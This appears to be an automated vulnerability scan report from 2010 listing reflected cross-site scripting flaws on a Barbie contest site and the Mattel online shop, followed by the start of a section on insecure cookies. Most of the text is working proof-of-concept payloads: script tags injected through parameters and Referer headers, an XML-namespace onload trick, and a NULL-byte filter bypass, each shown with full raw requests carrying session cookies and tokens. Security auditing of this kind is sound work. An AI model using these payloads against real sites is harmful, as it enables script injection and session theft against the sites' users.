<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: 163a7--><script>alert(1)</script>cd69434ff01=1 --> ...[SNIP]...
The value of the count request parameter is copied into the XML document as plain text between tags. The payload dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5 was submitted in the count parameter. This input was echoed as dd6a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f87dd1d1038a469c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /get_contest_entries?xml=1&count=5dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=1&page=1 HTTP/1.1 Host: videogirlcontest.barbie.com Proxy-Connection: keep-alive Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 3275 Content-Type: text/xml; charset=utf-8 Expires: Thu, 23 Dec 2010 00:12:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 23 Dec 2010 00:12:26 GMT Connection: close Set-Cookie: session=4d1293eaf95db56a; path=/; expires=Thu, 23-Dec-2010 00:42:26 GMT
The value of the page request parameter is copied into the XML document as plain text between tags. The payload %0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 was submitted in the page parameter. This input was echoed as 77700<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>75baf303698aec4c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /get_contest_entries?xml=1&count=5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=2&page=1%0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 HTTP/1.1 Host: videogirlcontest.barbie.com Proxy-Connection: keep-alive Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 6787 Content-Type: text/xml; charset=utf-8 Expires: Thu, 23 Dec 2010 00:12:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 23 Dec 2010 00:12:31 GMT Connection: close Set-Cookie: session=4d1293ee9ab6f3c0; path=/; expires=Thu, 23-Dec-2010 00:42:30 GMT
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714b8"><script>alert(1)</script>8c42dd9f9f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:36 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3;u2=1;u3=;u1=;ord=1;num=99400337?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae536"><script>alert(1)</script>9892daaa3cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /cartHandler/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:34 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd;u2=1;u3=;u1=;ord=1;num=40158534?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83600"><script>alert(1)</script>03a94f135fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /category/index.jsp?categoryId=3741286 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:13 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd;u2=5;u3=;u1=;ord=1;num=88359962?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eb3"><script>alert(1)</script>fe48f0b8dca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /history/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:34 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45088
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca;u2=1;u3=;u1=;ord=1;num=33774843?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 129a5"><script>alert(1)</script>d516d332891 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:51 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891;u2=1;u3=;u1=;ord=1;num=32562816?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b892"><script>alert(1)</script>2213eb59c24 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /product/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:48 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45312
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24;u2=1;u3=;u1=;ord=1;num=60684825?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c6f"><script>alert(1)</script>27e45151b39 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /search/controller.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:35 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45183
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39;u2=1;u3=;u1=3747401524;ord=1;num=17518156?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7fd"><script>alert(1)</script>a8c907b55ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /shop/index.jsp?categoryId=3719992 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:38 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff;u2=5;u3=;u1=;ord=1;num=82099516?" width="1" height="1" frameborder="0"> ...[SNIP]...
2. SSL cookie without secure flag setpreviousnext There are 11 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
